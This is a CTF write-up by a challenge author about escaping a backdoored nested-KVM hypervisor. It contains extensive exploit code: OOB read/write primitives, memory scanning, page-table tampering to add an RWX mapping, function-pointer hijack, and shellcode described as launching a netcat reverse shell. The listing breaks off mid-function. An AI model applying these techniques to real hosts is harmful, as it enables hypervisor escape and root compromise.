
Sunday, August 4, 2024

corCTF 2024 - Trojan Turtles: A KVM Escape Exploit from the L2 Guest to the L1 Hypervisor

For the past several iterations of corCTF, we had hoped to release two new types of challenges in our competition: a Windows kernel challenge and a hypervisor escape challenge. With less than two days to go before this year’s CTF, we only had three pwnable challenges. A potential Windows kernel challenge was marred by infrastructure difficulties (and never made it to release, despite our tweet poking fun at CrowdStrike), so I decided to try my hand at making a simple hypervisor escape challenge. Inspired by Project Zero’s crazy nested KVM escape exploit on SVM, I decided to dig briefly into KVM’s nested VMX implementation.

Nested virtualization is actually quite an interesting topic, and the name of this challenge comes from the original nested KVM paper: The Turtles Project. I recommend that you read the paper, but as a quick high-level overview, Intel VMX provides a set of instructions for hardware-accelerated virtualization. Virtualized execution is effectively native, except when traps (VM-exits) occur that the host must handle - these traps can be caused by events like MMIO reads/writes or certain instructions that VMX non-root operation does not support (like the VMX instructions themselves). Because the hardware only supports a single level of virtualization, nesting on Intel and AMD follows the model of a single root hypervisor handling all guests and nested guests. The root hypervisor at L0 emulates VMX instructions for its L1 guest when the L1 guest acts as the “KVM hypervisor” for an L2 guest. L0 thus sets up all the VMX structures that L1 is attempting to create for L2 and then basically runs L2 as if it were at the same level as the L1 guest (the paper uses the term guest “multiplexing”). When a VM-exit happens, the L0 hypervisor then has to decide which guest, if any, to forward the handling to. At each level (L0, L1, L2, L3, etc.), the KVM driver thinks of itself as L0 and can have its own guests and provide VMX emulation for its nested guests. With this idea, we can nest hypervisors to an arbitrary depth (with terrible performance implications the deeper we go).
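
To make the multiplexing idea a little more concrete, here is a purely illustrative toy model of the decision L0 faces on every VM-exit taken by a nested guest. This is my own sketch with made-up types - it is not KVM's actual code or data structures:

#include <stdbool.h>
#include <stdio.h>

/* Illustrative only: a toy model of L0's exit routing, not KVM's real logic. */
enum exit_reason { EXIT_MMIO, EXIT_VMX_INSN, EXIT_EXTERNAL_IRQ };

struct toy_vcpu {
    bool is_nested_guest;   /* true if this vCPU is really running L2 on behalf of L1 */
    bool l1_wants_exit[3];  /* which exit reasons L1 asked to intercept */
};

/* L0 sees every exit first; it either handles it itself or reflects it to L1. */
static const char *route_exit(struct toy_vcpu *vcpu, enum exit_reason reason)
{
    if (!vcpu->is_nested_guest)
        return "handled by L0";
    if (reason == EXIT_VMX_INSN || vcpu->l1_wants_exit[reason])
        return "reflected to L1 (a synthetic VM-exit into the L1 hypervisor)";
    return "handled directly by L0 on L1's behalf";
}

int main(void)
{
    struct toy_vcpu l2 = { .is_nested_guest = true, .l1_wants_exit = { true, true, false } };
    printf("external interrupt during L2: %s\n", route_exit(&l2, EXIT_EXTERNAL_IRQ));
    printf("vmread executed by L2:        %s\n", route_exit(&l2, EXIT_VMX_INSN));
    return 0;
}

In real KVM this decision is driven by the controls that L1 programmed into its vmcs12 - the very structure the backdoor below operates on.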

For starters, the L1 VM ran a 6.9.0 Linux kernel, booted with the following run script:

#!/bin/sh

qemu-system-x86_64 \
    -m 1024 \
    -nographic \
    -no-reboot \
    -kernel bzImage-6.9 \
    -append "console=ttyS0 root=/dev/sda quiet loglevel=3 rd.systemd.show_status=auto rd.udev.log_level=3 panic=-1 net.ifnames=0 pti=off no5lvl" \
    -hda chall.qcow2 \
    -snapshot \
    -netdev user,id=net \
    -device e1000,netdev=net \
    -monitor /dev/null \
    -cpu host \
    -smp cores=2 \
    --enable-kvm

It ran an Alpine Busybox system with the OpenRC init system. Upon startup, it ran the following script as a low-privileged user to boot the L2 guest, which ran an Ubuntu 5.15.0-107 HWE kernel and dropped players into a root shell:

#!/bin/sh

cd /vm

qemu-system-x86_64 \
    -m 512 \
    -smp 1 \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 loglevel=3 panic=-1 pti=off kaslr no5lvl" \
    -no-reboot \
    -netdev user,id=net \
    -device e1000,netdev=net \
    -monitor /dev/null \
    -cpu host \
    -initrd "./initramfs.cpio.gz" \
    -enable-kvm

As stated in the description, the goal is to escape from the L2 guest into the L1 host with root privileges. Provided to the players were two KVM drivers used in the L1 host, one of which was backdoored as a play on the recent xz supply-chain fiasco. With binary diffing tools like BinDiff or Diaphora, one can quickly see that there are only two differences, in the handle_vmread and handle_vmwrite functions.

In both cases, an extra snippet of code was added before the inlined call to get_vmcs12_field_offset after some simple vmread and vmwrite condition checks.

For handle_vmread it was the following: 

if (kvm_get_dr(vcpu, 0) == 0x1337babe) {
    int64_t offset = kvm_get_dr(vcpu, 1);
    kvm_set_dr(vcpu, 2, *(((uint64_t *)vmcs12) + offset));
}

And for handle_vmwrite:  

if (kvm_get_dr(vcpu, 0) == 0x1337babe) {
    int64_t offset = kvm_get_dr(vcpu, 1);
    uint64_t val = kvm_get_dr(vcpu, 2);
    *(((uint64_t *)vmcs12) + offset) = val;
}

Basically, if the debug register dr0 holds a specific magic value, then dr1 and dr2 are used to perform arbitrary OOB read/write from the emulated vmcs12 structure the hypervisor allocates for nested guests. More specifically, this vmcs12 structure is allocated in the L1 host (running under an L0 host) when it performs VMX emulation for an L2 guest attempting to kick off an L3 guest - all these layers can become really confusing!
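
To be explicit about the reach of this primitive: dr1 is interpreted as a signed index in 8-byte units relative to the vmcs12 allocation, so any qword at vmcs12 + 8*offset is reachable, before or after the allocation. Below is a tiny userspace model of those semantics - my own illustrative sketch (the struct and buffer are made up), not KVM code:

#include <stdint.h>
#include <stdio.h>

/* Toy model of the backdoor: dr0 = magic trigger, dr1 = signed qword offset
 * from the vmcs12 allocation, dr2 = value in/out. */
#define BACKDOOR_TRIGGER 0x1337babeull

struct fake_regs { uint64_t dr0, dr1, dr2; };

static void backdoor_vmread(struct fake_regs *r, uint64_t *vmcs12)
{
    if (r->dr0 == BACKDOOR_TRIGGER)
        r->dr2 = *(vmcs12 + (int64_t)r->dr1);   /* OOB read at vmcs12 + 8*offset */
}

static void backdoor_vmwrite(struct fake_regs *r, uint64_t *vmcs12)
{
    if (r->dr0 == BACKDOOR_TRIGGER)
        *(vmcs12 + (int64_t)r->dr1) = r->dr2;   /* OOB write at vmcs12 + 8*offset */
}

int main(void)
{
    uint64_t heap[64] = { 0 };
    uint64_t *vmcs12 = &heap[32];               /* pretend this is the vmcs12 allocation */
    struct fake_regs regs = { BACKDOOR_TRIGGER, (uint64_t)-4, 0xdeadbeef };

    backdoor_vmwrite(&regs, vmcs12);            /* lands 4 qwords before the "allocation" */
    backdoor_vmread(&regs, vmcs12);
    printf("read back 0x%llx from offset %lld\n",
           (unsigned long long)regs.dr2, (long long)(int64_t)regs.dr1);
    return 0;
}

The real backdoor does the same arithmetic, just with kvm_get_dr/kvm_set_dr as the transport for the three values.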

The following two article series do a really good job of explaining how to enter VMX operation for hypervisor development: https://rayanfam.com/topics/hypervisor-from-scratch-part-3/ and https://revers.engineering/7-days-to-virtualization-a-series-on-hypervisor-development/. To trigger the evil code path, all we have to do is enter VMX root operation with the vmxon instruction and load a VMCS (Virtual-Machine Control Structure) with the vmptrld instruction. VMX root operation allows the hypervisor to prepare and control the behavior of the guest, which runs in non-root operation. When a guest executes vmxon, the emulated VMX handler handle_vmxon zero-allocates a page for the nested guest’s VMCS structure.

For triggering and utilizing the backdoor, I created the following primitives: 

static uint8_t vmxon(volatile uint64_t phys)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmxon [%[phys]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[phys]"r"(&phys):);
    return ret;
}

static uint8_t vmptrld(volatile uint64_t phys)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmptrld [%[phys]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[phys]"r"(&phys):);
    return ret;
}

static uint64_t vmread(volatile uint16_t field)
{
    uint8_t ret;
    uint64_t result;
    asm volatile(INTEL(
        "vmread [%[result]], %[field];"
        "setna %[ret];")
        :[ret]"=r"(ret):[result]"r"(&result),[field]"r"((uint64_t)field):);
    if (ret) {
        printk(KERN_WARNING "vmread of field 0x%x failed\n", field);
    }
    return (ret)?ret:result;
}

static uint8_t vmwrite(volatile uint16_t field, volatile uint64_t val)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmwrite %[field], [%[val]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[val]"r"(&val),[field]"r"((uint64_t)field):);
    return ret;
}

#define BACKDOOR_TRIGGER 0x1337babe
#define VM_FUNCTION_CONTROL 0x00002018

#define STRINGIFY(x) #x
#define STRINGIFY_INT(x) STRINGIFY(x)

static uint64_t oob_read(uint64_t offset)
{
    uint8_t err;
    uint64_t val;
    asm volatile(INTEL(
        "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";"
        "mov dr0, rax;"
        "mov rax, %[offset];"
        "mov dr1, rax;"
        "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";"
        "call %[vmread];"
        "mov %[err], al;")
        :[err]"=r"(err):[offset]"r"(offset),[vmread]"r"(&vmread):"rax","rdi");
    if (err) {
        printk(KERN_INFO "oob read 0x%llx failure\n", offset);
        asm volatile ("ud2;");
    }
    asm volatile(INTEL(
        "mov rax, dr2;"
        "mov %[val], rax;")
        :[val]"=r"(val)::"rax");
    return val;
}

static void oob_write(uint64_t offset, uint64_t val)
{
    uint8_t err;
    asm volatile(INTEL(
        "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";"
        "mov dr0, rax;"
        "mov rax, %[offset];"
        "mov dr1, rax;"
        "mov rax, %[val];"
        "mov dr2, rax;"
        "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";"
        "call %[vmwrite];"
        "mov %[err], al;")
        :[err]"=r"(err):[offset]"r"(offset),[val]"r"(val),[vmwrite]"r"(&vmwrite):"rax","rdi");
    if (err) {
        printk(KERN_INFO "oob write 0x%llx (%llx) failure\n", offset, val);
        asm volatile ("ud2;");
    }
}

Now, the L2 guest has arbitrary OOB read and write in the L1 hypervisor’s kernel. At this point, the challenge just becomes a case of “pwn the kernel” given arbitrary OOB read/write on the kernel heap, albeit without a shell on the host. It’s not particularly difficult, so I will just outline my approach.

  1. I first wipe the first qword of the guest’s physical memory (through the guest physmap) and zero out the guest’s own modprobe_path. This keeps the scans in the next steps from matching the guest’s own copies of these values, which could otherwise derail the search and crash the L1 kernel. The beginning of the physical zero page contains many repetitions of the dword 0xf000ff53, which are probably just real-mode far pointers (default IVT entries) left over from bootloader or firmware execution.

  2. I now scan for the L1 kernel’s modprobe_path from the L1 physmap’s perspective. A pattern that repeats throughout the exploit is xor-encoding the search target and xor-decoding the result of each OOB read; this prevents the scan from matching the constants embedded in the exploit driver itself (which also lives somewhere in L1 memory). Additionally, I optimize the search by using the known low 12 bits of the target so the scan can step in 0x1000-byte intervals (the vmcs12 structure itself is page sized). To account for the hypervisor’s modprobe_path lying either before or after vmcs12 in the physmap, I first search backwards while also watching for the 0xf000ff53 marker that signals I have reached physical address zero; if the target has not been found by then, I restart the search going forward (otherwise I would read below physical address zero and crash the L1 host).

  3. With modprobe_path’s location in the L1 physmap found, I can now recover L1’s physmap base by computing the relative offset of page_offset_base and performing another OOB read. From there I can also derive the L1 kernel base as seen through the physmap, as well as where my current vmcs12 sits in the L1 kernel virtual address space. This last piece of information turns the OOB primitives into arbitrary read and write, since I can now compute an offset for any L1 virtual address.

  4. Looking ahead, the ultimate goal for privilege escalation is to hijack a function pointer. The aforementioned Project Zero SVM escape exploit provided a great target: kvm->arch.kvmclock_update_work.work.func. How do we find the kvm struct for our current L2 guest in the L1 host? We can accomplish this by locating the kvm_vcpu struct, whose first field points to the kvm struct. To find the kvm_vcpu struct, I stash a magic value in the dr3 register, which KVM saves into the db array of the vcpu’s kvm_vcpu_arch, and scan for it. kvm_vcpu objects are allocated by the KVM_CREATE_VCPU ioctl from a dedicated kmem_cache; based on /proc/slabinfo, each slab holds only 3 of these objects, so the lower 12 bits of the dr3 storage location can only be 0xb80, 0xc40, or 0xd00.

  5. Now, with knowledge of the L1 virtual addresses of our L2 guest’s kvm and kvm_vcpu structs, we read what the target function pointer currently holds. This value will serve as a continuation function so that normal system operation resumes seamlessly after our exploit payload triggers.

  6. Here is where the fun part of my exploit begins. Using knowledge of the L1 physmap and kernel layout, I walk the task_struct objects starting from init_task to find an mm pointer, from which I can read the pgd field - this gives me the root page table pointer (the PML4 pointer on a 4-level paging system - x86_64 paging terminology can get really confusing) for a given task in the L1 kernel. I then index that PML4 with the L1 physmap base address to locate the PUD table that controls the kernel’s physmap mapping, which every task shares (the page-table arithmetic is sketched just after this list).

  7. While traversing the list of tasks, one can also recover the actual virtual address of the L1 kernel’s .text base, since the task list’s linked-list pointers lead back into init_task, which sits at a known offset from the kernel base.

  8. Now I find a free entry in that PUD and add an entry mapping a read-write-execute 1 GB huge page starting at physical address 0 (see the sketch after this list for the exact entry bits). I then fill L1 physical page 0 with a payload: the pointers and strings needed for call_usermodehelper, followed by shellcode that invokes it with UMH_WAIT_EXEC to spawn a netcat reverse shell. Once the reverse shell process has started, the shellcode trampolines back to the original function from kvm->arch.kvmclock_update_work.work.func so execution continues normally. While I could have modified existing page table entries in the L1 host instead, I would have had to ensure the stale entries were flushed from the TLB for the new permissions to become architecturally visible.

  9. Finally, I overwrite the target function pointer with the address of the shellcode in the new evil rwx mapping and wait around 5 minutes for the kvmclock update worker to fire (as mentioned in the Project Zero exploit). The system continues to function smoothly, and I eventually get a reverse shell - hypervisor escaped!
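
To make steps 6 and 8 concrete, here is a small standalone sketch of the page-table arithmetic involved (the addresses are made up; only the bit manipulation mirrors the exploit). The PML4 and PUD indices come from bits 47:39 and 38:30 of a virtual address, and the entry value 0xe3 written in step 8 decodes to Present | Writable | Accessed | Dirty | PageSize with a physical base of 0 and the NX bit clear - i.e. a supervisor rwx 1 GB window over physical memory starting at 0:

#include <stdint.h>
#include <stdio.h>

/* Page-table arithmetic used in steps 6-8 (illustrative, made-up addresses). */
#define PML4_INDEX(va) (((va) >> 39) & 0x1ff)
#define PUD_INDEX(va)  (((va) >> 30) & 0x1ff)

/* 1 GB huge-page PUD entry: Present | RW | Accessed | Dirty | PS, phys base 0, NX clear. */
#define EVIL_PUD_ENTRY 0xe3ull

int main(void)
{
    uint64_t physmap_base = 0xffff916a40000000ull;  /* made-up L1 page_offset_base */
    uint64_t pml4_slot = PML4_INDEX(physmap_base);  /* which PML4 entry maps the physmap */
    uint64_t free_pud_slot = 0x42;                  /* pretend this PUD entry was free */

    /* Virtual address the new entry will map: same PML4 slot as the physmap,
     * with the chosen PUD slot selecting a 1 GB-aligned window over phys 0. */
    uint64_t evil_vaddr = (physmap_base & ~((1ull << 39) - 1)) | (free_pud_slot << 30);

    printf("PML4 index of physmap: %llu\n", (unsigned long long)pml4_slot);
    printf("PUD index of evil mapping: %llu\n", (unsigned long long)PUD_INDEX(evil_vaddr));
    printf("evil 1 GB rwx mapping at: 0x%llx (entry value 0x%llx)\n",
           (unsigned long long)evil_vaddr, (unsigned long long)EVIL_PUD_ENTRY);
    return 0;
}

Writing a brand-new entry also sidesteps the TLB-flushing concern from step 8, since no stale translation for the new virtual range can exist.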

Here is the final exploit:

#include <asm-generic/io.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/kmod.h>
#include <linux/kprobes.h>
#include <linux/types.h>
#include <linux/slab.h>
#include <linux/mm.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("FizzBuzz101");

#define INTEL(x) \
    ".intel_syntax noprefix;" \
    x \
    ".att_syntax;"

#define IA32_FEATURE_CONTROL 0x3a
#define IA32_VMX_BASIC 0x480
#define IA32_VMX_CR0_FIXED0 0x486
#define IA32_VMX_CR0_FIXED1 0x487
#define IA32_VMX_CR4_FIXED0 0x488
#define IA32_VMX_CR4_FIXED1 0x489

typedef union {
    uint64_t value;
    struct {
        uint64_t lock : 1;
        uint64_t enable_smx : 1;
        uint64_t enable_vmxon : 1;
        uint64_t reserved : 61;
    } fields;
} IA32_FEATURE_CONTROL_MSR;

typedef struct {
    uint32_t revision : 31;
    uint32_t shadow_vmcs : 1;
}vmxon_region_t;

typedef struct {
    struct {
        uint32_t revision : 31;
        uint32_t shadow_vmcs : 1;
    }header;
}vmcs_region_t;

static struct kprobe kp = {
    .symbol_name = "kallsyms_lookup_name"
};

static unsigned long (*find_symbol)(const char* name);

static bool supports_vmx(void)
{
    // Intel SDM 22.6-7
    uint32_t eax, ebx, ecx, edx;
    IA32_FEATURE_CONTROL_MSR feature_msr;

    cpuid(0, &eax, &ebx, &ecx, &edx);
    // check if GenuineIntel
    if (ebx != 0x756e6547 || edx != 0x49656e69 || ecx != 0x6c65746e)
        return false;

    cpuid(1, &eax, &ebx, &ecx, &edx);
    // check for VMX support
    if (!(ecx & (1 << 5)))
        return false;

    // check 0x3a MSR on IA32_FEATURE_CONTROL,
    rdmsrl(IA32_FEATURE_CONTROL, feature_msr.value);
    if (!feature_msr.fields.lock) {
        feature_msr.fields.lock = 1;
        feature_msr.fields.enable_vmxon = 1;
        wrmsrl(IA32_FEATURE_CONTROL, feature_msr.value);
    } else if (!feature_msr.fields.enable_vmxon) {
        return false;
    }
    return true;
}

static uint64_t read_cr4(void)
{
    uint64_t cr4 = 0;
    asm volatile(INTEL(
        "mov %0, cr4\n")
        :"=r"(cr4)::);
    return cr4;
}

static void write_cr4(uint64_t cr4)
{
    asm volatile(INTEL(
        "mov cr4, %0\n")
        ::"r"(cr4):);
}

// entering with VMXON without CR4.VMXE results in UD, and set up MSRs accordingly
static void enable_vmxe(void)
{
    uint64_t msr_cr0_0, msr_cr0_1, msr_cr4_0, msr_cr4_1, cr0, cr4;

    cr4 = read_cr4();
    cr4 |= 1 << 13;
    write_cr4(cr4);

    // fix up CR0 and CR4
    rdmsrl(IA32_VMX_CR0_FIXED0, msr_cr0_0);
    rdmsrl(IA32_VMX_CR0_FIXED1, msr_cr0_1);
    rdmsrl(IA32_VMX_CR4_FIXED0, msr_cr4_0);
    rdmsrl(IA32_VMX_CR4_FIXED1, msr_cr4_1);

    cr0 = read_cr0();
    cr4 = read_cr4();

    cr0 = (cr0 | msr_cr0_0) & msr_cr0_1;
    cr4 = (cr4 | msr_cr4_0) & msr_cr4_1;

    write_cr0(cr0);
    write_cr4(cr4);
}

static inline void initialize_vmxon(vmxon_region_t *region)
{
    uint64_t revision;
    rdmsrl(IA32_VMX_BASIC, revision);
    region->revision = revision;
}

static inline void initialize_vmcs(vmcs_region_t *region, bool shadow)
{
    uint64_t revision;
    rdmsrl(IA32_VMX_BASIC, revision);
    region->header.revision = revision;
    region->header.shadow_vmcs = (shadow)?1:0;
}

static uint8_t vmxon(volatile uint64_t phys)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmxon [%[phys]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[phys]"r"(&phys):);
    return ret;
}

static uint8_t vmptrld(volatile uint64_t phys)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmptrld [%[phys]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[phys]"r"(&phys):);
    return ret;
}

static uint64_t vmread(volatile uint16_t field)
{
    uint8_t ret;
    uint64_t result;
    asm volatile(INTEL(
        "vmread [%[result]], %[field];"
        "setna %[ret];")
        :[ret]"=r"(ret):[result]"r"(&result),[field]"r"((uint64_t)field):);
    if (ret) {
        printk(KERN_WARNING "vmread of field 0x%x failed\n", field);
    }
    return (ret)?ret:result;
}

static uint8_t vmwrite(volatile uint16_t field, volatile uint64_t val)
{
    uint8_t ret;
    asm volatile(INTEL(
        "vmwrite %[field], [%[val]];"
        "setna %[ret];")
        :[ret]"=r"(ret):[val]"r"(&val),[field]"r"((uint64_t)field):);
    return ret;
}

#define BACKDOOR_TRIGGER 0x1337babe
#define VM_FUNCTION_CONTROL 0x00002018

#define STRINGIFY(x) #x
#define STRINGIFY_INT(x) STRINGIFY(x)

static uint64_t oob_read(uint64_t offset)
{
    uint8_t err;
    uint64_t val;
    asm volatile(INTEL(
        "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";"
        "mov dr0, rax;"
        "mov rax, %[offset];"
        "mov dr1, rax;"
        "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";"
        "call %[vmread];"
        "mov %[err], al;")
        :[err]"=r"(err):[offset]"r"(offset),[vmread]"r"(&vmread):"rax","rdi");
    if (err) {
        printk(KERN_INFO "oob read 0x%llx failure\n", offset);
        asm volatile ("ud2;");
    }
    asm volatile(INTEL(
        "mov rax, dr2;"
        "mov %[val], rax;")
        :[val]"=r"(val)::"rax");
    return val;
}

static void oob_write(uint64_t offset, uint64_t val)
{
    uint8_t err;
    asm volatile(INTEL(
        "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";"
        "mov dr0, rax;"
        "mov rax, %[offset];"
        "mov dr1, rax;"
        "mov rax, %[val];"
        "mov dr2, rax;"
        "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";"
        "call %[vmwrite];"
        "mov %[err], al;")
        :[err]"=r"(err):[offset]"r"(offset),[val]"r"(val),[vmwrite]"r"(&vmwrite):"rax","rdi");
    if (err) {
        printk(KERN_INFO "oob write 0x%llx (%llx) failure\n", offset, val);
        asm volatile ("ud2;");
    }
}

#define POB_TO_MODPROBE (0xffffffff913fd1f8ull - 0xffffffff9173f0c0ull)
#define KBASE_TO_MODPROBE (0xffffffff8fc00000ull - 0xffffffff9173f0c0ull)
#define INIT_TASK_TO_NEXT_TASK 0x478ull

#define CALC_BACK_OFFSET(x) ((0x1000ull - (0x1000ull - x)) / sizeof(uint64_t))
#define CALC_FORW_OFFSET(x) (x / sizeof(uint64_t))
#define PAGE_OFF (0x1000 / sizeof(uint64_t))
#define IDXIFY(x) (x / sizeof(uint64_t))

#define XOR_ENCRYPT_KEY 0x4141414141414141ull
#define HOST_MODPROBE_OFFSET 0x0c0ull

static void gwipe_first_qword(void)
{
    *(uint64_t *)page_offset_base = 0;
}

static int64_t hfind_modprobe_offset(void)
{
    // probably backwards
    // null out ours first
    memset((uint8_t*)find_symbol("modprobe_path"), 0, 0x10);

    // hex(struct.unpack('q',b"/sbin/mo")[0] ^ 0x4141414141414141)
    uint64_t xored_magic = 0x2e2c6e2f2823326e;
    int64_t offset = CALC_BACK_OFFSET(HOST_MODPROBE_OFFSET);
    uint64_t check = 0xf000ff53f000ff53ull ^ XOR_ENCRYPT_KEY;
    int64_t check_offset = 0;
    bool forward = false;

    while ((oob_read(offset) ^ XOR_ENCRYPT_KEY) != xored_magic) {
        offset -= PAGE_OFF;
        check_offset -= PAGE_OFF;
        if ((oob_read(check_offset) ^ XOR_ENCRYPT_KEY) == check) {
            forward = true;
            break;
        }
    }

    if (forward) {
        offset = CALC_FORW_OFFSET(HOST_MODPROBE_OFFSET);
        while ((oob_read(offset) ^ XOR_ENCRYPT_KEY) != xored_magic)
            offset += PAGE_OFF;
    }

    return offset;
}

static int64_t hfind_physmap_offset(void)
{
    uint64_t check = 0xf000ff53f000ff53ull ^ XOR_ENCRYPT_KEY;
    int64_t check_offset = 0;
    while ((oob_read(check_offset) ^ XOR_ENCRYPT_KEY) != check) {
        check_offset -= PAGE_OFF;
    }
    return check_offset;
}

#define EGG1 0x1337beefdeadbabe

// 3 objs per vcpu kmem cache, these are all the possible offsets
#define ARCH_DB_3_OFFSET_0 0xb80ull
#define ARCH_DB_3_OFFSET_1 0xc40ull
#define ARCH_DB_3_OFFSET_2 0xd00ull

static uint64_t hfind_vcpu_arch_db3(uint64_t physmap_base, uint64_t vmcs12)
{
    asm volatile(INTEL(
        "mov rax, " STRINGIFY_INT(EGG1) ";"
        "mov dr3, rax;")
        :::"rax");

    uint64_t check = EGG1 ^ XOR_ENCRYPT_KEY;
    int64_t offsets[] = {(physmap_base + ARCH_DB_3_OFFSET_0 - vmcs12) / 8,
                         (physmap_base + ARCH_DB_3_OFFSET_1 - vmcs12) / 8,
                         (physmap_base + ARCH_DB_3_OFFSET_2 - vmcs12) / 8};
    bool found = false;
    int64_t off;

    while (!found) {
        for (int i = 0; i < sizeof(offsets)/sizeof(int64_t); i++) {
            if ((oob_read(offsets[i]) ^ XOR_ENCRYPT_KEY) == check) {
                found = true;
                off = offsets[i];
                break;
            }
            offsets[i] += PAGE_OFF;
            if (offsets[i] > 0 && offsets[i] < PAGE_OFF) {
                if (i == 0) {
                    offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_0);
                } else if (i == 1) {
                    offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_1);
                } else {
                    offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_2);
                }
            }
        }
    }
    return vmcs12 + (off * 8);
}

#define EGG2 0xdeadbeefbab31337ull

static uint64_t hfind_guest_base_offset(uint64_t physmap_base, uint64_t vmcs12)
{
    int64_t off = (physmap_base - vmcs12) / 8;
    *(uint64_t *)page_offset_base = EGG2 ^ XOR_ENCRYPT_KEY;
    while ((oob_read(off) ^ XOR_ENCRYPT_KEY) != EGG2)
        off += PAGE_OFF;
    return off;
}

#define INIT_TASK_OFFSET (0xffffffffb400c980ull - 0xffffffffb2600000ull)
#define NEXT_TASK_OFFSET (0xffffffffb400cdf8ull - 0xffffffffb400c980ull)
#define MM_TO_NEXT_TASK_OFFSET 0x50

static uint64_t arb_read(uint64_t vmcs12, uint64_t addr)
{
    int64_t off = (addr - vmcs12) / 8;
    return oob_read(off);
}

static void arb_write(uint64_t vmcs12, uint64_t addr, uint64_t val)
{
    int64_t off = (addr - vmcs12) / 8;
    oob_write(off, val);
}

static void write_str(uint64_t vmcs12, uint64_t addr, char *str, int size)
{
    for (int i = 0; i < size; i += 8) {
        arb_write(vmcs12, addr + i, *((uint64_t *)(str + i)));
    }
}

static __attribute__((naked)) void shellcode(void)
{
    asm volatile(INTEL(
        "push rdi;"
        "push rsi;"
        "push rdx;"
        "push rcx;"
        "push rbx;"
        "lea rbx, qword ptr [rip - 0x111];"
        "mov rax, qword ptr [rbx];" // call_usermodehelper
        "lea rdi, qword ptr [rbx + 0x8 * 12];" // cmd, (12 entries)
        "lea rsi, qword ptr [rbx + 0x10];" // argv
        "lea rdx, qword ptr [rbx + 0x40];" // envp
        "xor rcx, rcx;" // UMH_NO_WAIT
        "inc rcx;" // UMH_WAIT_EXEC
        "call rax;"
        "mov rax, qword ptr [rbx + 0x8];" // get continuation
        "pop rbx;"
        "pop rcx;"
        "pop rdx;"
        "pop rsi;"
        "pop rdi;"
        // "ud2;"
        "jmp rax;"
    ):::);
}

static void shellcode_end(void) {}

void *vmxon_page;
void *vmcs_page;

#define CALL_USERMODEHELPER_OFFSET (0xffffffffa94a88e0ull - 0xffffffffa9400000ull)
#define UPDATEWORK_TO_KVM_STRUCT_OFFSET (0xffffac2b8029e420ull - 0xffffac2b80295000ull)

static int init_exploit_driver(void)
{
    uint64_t vmxon_phys, vmcs_phys;

    register_kprobe(&kp);
    find_symbol = (unsigned long (*)(const char *))kp.addr;
    if (!find_symbol) {
        pr_warn("failed to find kallsyms_lookup_name\n");
        return -1;
    }
    unregister_kprobe(&kp);

    if (!supports_vmx()) {
        pr_warn("system does not support vmx\n");
        return -1;
    }
    enable_vmxe();
    printk(KERN_INFO "exploit driver loaded\n");

    vmxon_page = (void *)get_zeroed_page(GFP_KERNEL);
    vmcs_page = (void *)get_zeroed_page(GFP_KERNEL);
    if (!vmxon_page || !vmcs_page) {
        pr_warn("page allocations failed\n");
        return -1;
    }

    initialize_vmxon((vmxon_region_t *)vmxon_page);
    initialize_vmcs((vmcs_region_t *)vmcs_page, false);

    vmxon_phys = virt_to_phys(vmxon_page);
    vmcs_phys = virt_to_phys(vmcs_page);

    if (vmxon(vmxon_phys)) {
        pr_info("vmxon failed\n");
        return -1;
    }

    if (vmptrld(vmcs_phys)) {
        pr_info("vmptrld failed\n");
        return -1;
    }

    gwipe_first_qword();

    uint64_t modprobe_path_offset = hfind_modprobe_offset();
    uint64_t page_offset_base_offset = modprobe_path_offset + IDXIFY(POB_TO_MODPROBE);
    uint64_t physmap_base = oob_read(page_offset_base_offset);
    uint64_t physmap_base_offset = hfind_physmap_offset();
    uint64_t kbase_physmap = 8 * modprobe_path_offset + KBASE_TO_MODPROBE + physmap_base - physmap_base_offset * 8;
    uint64_t curr_vmcs12 = physmap_base - physmap_base_offset * 8;

    printk(KERN_INFO "host kbase: 0x%llx\n", kbase_physmap);
    printk(KERN_INFO "host physmap base: 0x%llx\n", physmap_base);
    printk(KERN_INFO "current vmcs12: 0x%llx\n", curr_vmcs12);
    printk(KERN_INFO "physmap base offset: 0x%llx\n", physmap_base_offset);

    uint64_t curr_vcpu_arch_db3 = hfind_vcpu_arch_db3(physmap_base, curr_vmcs12);
    printk(KERN_INFO "curr vcpu arch db3: 0x%llx\n", curr_vcpu_arch_db3);

    uint64_t curr_kvm = arb_read(curr_vmcs12, curr_vcpu_arch_db3 - 0xb80);
    printk(KERN_INFO "curr kvm: 0x%llx\n", curr_kvm);

    uint64_t curr_kvm_updatework_funcptr_addr = curr_kvm + UPDATEWORK_TO_KVM_STRUCT_OFFSET + 0x18;
    uint64_t updatework_orig = arb_read(curr_vmcs12, curr_kvm_updatework_funcptr_addr);
    printk(KERN_INFO "kvm updatework at: 0x%llx, currently holds: 0x%llx\n", curr_kvm_updatework_funcptr_addr, updatework_orig);

    uint64_t physmap_init_task = kbase_physmap + INIT_TASK_OFFSET + NEXT_TASK_OFFSET;
    uint64_t next_task = arb_read(curr_vmcs12, physmap_init_task);
    uint64_t next_task_mm_ptr = arb_read(curr_vmcs12, next_task + 0x50);
    uint64_t next_task_pml4_ptr = arb_read(curr_vmcs12, next_task_mm_ptr + 0x80);
